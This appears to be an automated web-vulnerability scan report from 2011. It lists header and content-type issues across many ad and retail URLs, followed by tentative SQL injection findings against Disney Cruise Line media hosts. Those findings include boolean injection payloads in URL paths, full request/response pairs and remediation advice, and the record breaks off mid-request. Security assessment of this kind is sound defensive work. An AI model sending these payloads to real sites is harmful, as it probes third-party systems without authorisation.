27.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93

27.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221

27.3. http://a.tribalfusion.com/j.ad

27.4. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney

27.5. http://ad.doubleclick.net/ad/N6434.1165.SONY.COM/B4856611.338

27.6. http://ad.turn.com/server/pixel.htm

27.7. http://ahome.disney.go.com/globalelements/chrome.css

27.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

27.9. http://api.ak.facebook.com/restserver.php

27.10. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx

27.11. http://b.scorecardresearch.com/b

27.12. http://c7.zedo.com/utils/ecSet.js

27.13. http://cdn.turn.com/server/ddc.htm

27.14. http://cdn5.tribalfusion.com/media/1956006/frame.html

27.15. http://cm.g.doubleclick.net/pixel

27.16. http://content.usatoday.com/asp/usataj/usatajhost.htm

27.17. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

27.18. http://d.xp1.ru4.com/um

27.19. http://dar.youknowbest.com/

27.20. http://data.adsrvr.org/map/cookie/contextweb

27.21. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote

27.22. http://dcl2.wdpromedia.com/concat/4.39.1.5/css

27.23. http://disneycruise.disney.go.com/reservations/customize

27.24. http://feeds.bbci.co.uk/news/rss.xml

27.25. http://feeds.delicious.com/v2/json/urlinfo/data

27.26. http://fingerhut-www.baynote.net/baynote/tags3/common

27.27. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard

27.28. http://fls.doubleclick.net/activityi

27.29. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

27.30. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/

27.31. http://gs.instantservice.com/geoipAPI.js

27.32. http://https.edge.ru4.com/smartserve/ad

27.33. http://i.usatoday.net/asp/usatly/handler.ashx

27.34. http://images.scanalert.com/meter/www.mcafee.com/55.gif

27.35. http://imawow.weather.com/web/common/wxicons/36/26.gif

27.36. http://l.addthiscdn.com/live/t00/250lo.gif

27.37. http://login.dotomi.com/ucm/UCMController

27.38. http://metrics.fingerhut.com/b/ss/fingerhutcomprod/1/H.21/s03779584402218

27.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s06847484195604

27.40. http://metrics.sonystyle.com/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719

27.41. http://metrics.us.playstation.com/b/ss/sceablogsprod/1/H.20.3/s87736232713796

27.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

27.43. http://nexus2.ensighten.com/sony/serverComponent.php

27.44. http://odb.outbrain.com/utils/ping.html

27.45. http://pagead2.googlesyndication.com/pagead/imgad

27.46. http://pastebin.com/trends

27.47. http://pixel.invitemedia.com/pubmatic_sync

27.48. http://pubads.g.doubleclick.net/gampad/ads

27.49. http://r.turn.com/r/beacon

27.50. http://rs.instantservice.com/resources/smartbutton/7470/II3_Servers.js

27.51. http://s7.addthis.com/js/250/addthis_widget.js

27.52. http://secureshopping.mcafee.com/

27.53. http://serv.adspeed.com/ad.php

27.54. http://sony.links.channelintelligence.com/pages/prices.asp

27.55. http://sony.links.origin.channelintelligence.com/pages/wl.asp

27.56. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

27.57. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

27.58. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.59. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css

27.60. http://sync.mathtag.com/sync/img

27.61. http://t.invitemedia.com/track_imp

27.62. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros

27.63. http://tag.contextweb.com/TagPublish/getjs.aspx

27.64. http://travel.travelocity.com/favicon.ico

27.65. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

27.66. http://ts.istrack.com/trackingAPI.js

27.67. http://turn.nexac.com/r/pu

27.68. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410

27.69. http://w88.go.com/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829

27.70. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico

27.71. http://wow.weather.com/weather/wow/module/USNY0400

27.72. http://www.bhphotovideo.com/bnh/controller/home

27.73. http://www.cruisecritic.com/reviews/cruiseline.cfm

27.74. http://www.facebook.com/plugins/like.php

27.75. http://www.google-analytics.com/__utm.gif

27.76. http://www.googleadservices.com/pagead/conversion/1034849195/

27.77. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp

27.78. https://www.mcafeesecure.com/RatingVerify

27.79. http://www.mickeypath.com/id/1304751739.jpg

27.80. http://www.orbitz.com/favicon.ico

27.81. http://www.passporter.com/concierge/ticker/countdown17548-1026.png

27.82. http://www.passporterboards.com/forums/clientscript/vbulletin_important.css

27.83. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

27.84. http://www.siteadvisor.com/download/windows.html

27.85. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

27.86. http://www.viddler.com/file/7d63c65a/html5mobile/

28. Cacheable HTTPS response

28.1. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico

28.2. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

28.3. https://www.fingerhut.com/js/financial-snapshot.jsp

28.4. https://www.fingerhut.com/js/persistent_cart.jsp

28.5. https://www.fingerhut.com/js/sifr.jsp

28.6. https://www.fingerhut.com/user/login.jsp

28.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

29. HTML does not specify charset

29.1. http://a.tribalfusion.com/p.media/a3mOnI36QY5s7eUsBlWGMhRPnNTtMSWrb13rIoWEjpTaFaPaYFRVjZaQUaoRt7bUGjU4UmxmHyMXamx4dMFPGjZd5AULmW6yVHjhYUf9XFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r3aUHfSmmMCpVMtmHfolxCrdP/2020316/frame.html

29.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

29.3. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233

29.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

29.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45

29.6. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

29.7. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

29.8. http://ad.doubleclick.net/adi/x1.dt/dt

29.9. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

29.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.11. http://cdn5.tribalfusion.com/media/1956006/frame.html

29.12. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

29.13. http://content.usatoday.com/asp/usataj/usatajhost.htm

29.14. http://d.xp1.ru4.com/um

29.15. http://ds.addthis.com/red/psi/sites/travel.usatoday.com/p.json

29.16. http://f.nexac.com/e/a-677/s-2140.xgi

29.17. http://fls.doubleclick.net/activityi

29.18. http://https.edge.ru4.com/smartserve/ad

29.19. http://odb.outbrain.com/utils/ping.html

29.20. http://ping.chartbeat.net/ping

29.21. http://pixel.invitemedia.com/data_sync

29.22. http://serv.adspeed.com/ad.php

29.23. http://wow.weather.com/weather/wow/module/USNY0400

29.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

30. Content type incorrectly stated

30.1. http://6e8d64.r.axf8.net/mr/a.gif

30.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221

30.3. http://blog.us.playstation.com/wp-content/themes/twenty11/images/ps_bg_support_gif.gif

30.4. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

30.5. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

30.6. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

30.7. http://eval.bizrate.com/js/survey_126457_1.js

30.8. http://feeds.delicious.com/v2/json/urlinfo/data

30.9. http://fingerhut-www.baynote.net/baynote/tags3/common

30.10. http://gs.instantservice.com/geoipAPI.js

30.11. http://https.edge.ru4.com/smartserve/ad

30.12. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

30.13. http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11

30.14. http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43

30.15. http://secureshopping.mcafee.com/images/favicon.ico

30.16. http://shop.pacsun.com/js/widget-qv-uc.jsp

30.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

30.18. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

30.19. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard

30.20. http://sr2.liveperson.net/hcp/html/mTag.js

30.21. http://ts.istrack.com/trackingAPI.js

30.22. http://us.playstation.com/uwps/CookieHandler

30.23. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico

30.24. http://wow.weather.com/weather/wow/module/USNY0400

30.25. http://www.facebook.com/extern/login_status.php

30.26. http://www.fingerhut.com/assets/f/misc/bkgicon.jpg

30.27. http://www.fingerhut.com/fingerhut/assets/images/favicon.ico

30.28. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp

30.29. http://www.fingerhut.com/js/financial-snapshot.jsp

30.30. http://www.fingerhut.com/js/persistent_cart.jsp

30.31. http://www.fingerhut.com/js/sifr.jsp

30.32. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico

30.33. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

30.34. https://www.fingerhut.com/js/financial-snapshot.jsp

30.35. https://www.fingerhut.com/js/persistent_cart.jsp

30.36. https://www.fingerhut.com/js/sifr.jsp

30.37. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif

30.38. http://www.passporterboards.com/forums/customavatars/avatar15288_4.gif

30.39. http://www.passporterboards.com/forums/customavatars/avatar17690_3.gif

30.40. http://www.passporterboards.com/forums/customavatars/avatar18759_15.gif

30.41. http://www.passporterboards.com/forums/customavatars/avatar30289_3.gif

30.42. http://www.passporterboards.com/forums/customavatars/avatar3404_4.gif

30.43. http://www.passporterboards.com/forums/customavatars/avatar7184_7.gif

30.44. http://www.passporterboards.com/forums/signaturepics/sigpic1001_7.gif

30.45. http://www.passporterboards.com/forums/signaturepics/sigpic10872_14.gif

30.46. http://www.passporterboards.com/forums/signaturepics/sigpic17690_3.gif

30.47. http://www.passporterboards.com/forums/signaturepics/sigpic18031_10.gif

30.48. http://www.passporterboards.com/forums/signaturepics/sigpic18759_24.gif

30.49. http://www.passporterboards.com/forums/signaturepics/sigpic21228_3.gif

30.50. http://www.passporterboards.com/forums/signaturepics/sigpic3404_109.gif

30.51. http://www.passporterboards.com/forums/signaturepics/sigpic7184_20.gif

30.52. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

30.53. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

31. Content type is not specified

31.1. http://ads.bluelithium.com/st

31.2. http://localhost:50386/favicon.ico

31.3. http://localhost:50386/hoyt.net

31.4. http://localhost:50386/hoyt.net/sitefinity

31.5. http://pcm1.map.pulsemgr.com/uds/pc

31.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

31.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38734480'%20or%201%3d1--%20 and 38734480'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media38734480'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 102641
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /media38734480'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 33396
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15929969'%20or%201%3d1--%20 and 15929969'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /concat15929969'%20or%201%3d1--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 102597
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /concat15929969'%20or%201%3d2--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 33352
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.3. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20163560'%20or%201%3d1--%20 and 20163560'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media20163560'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
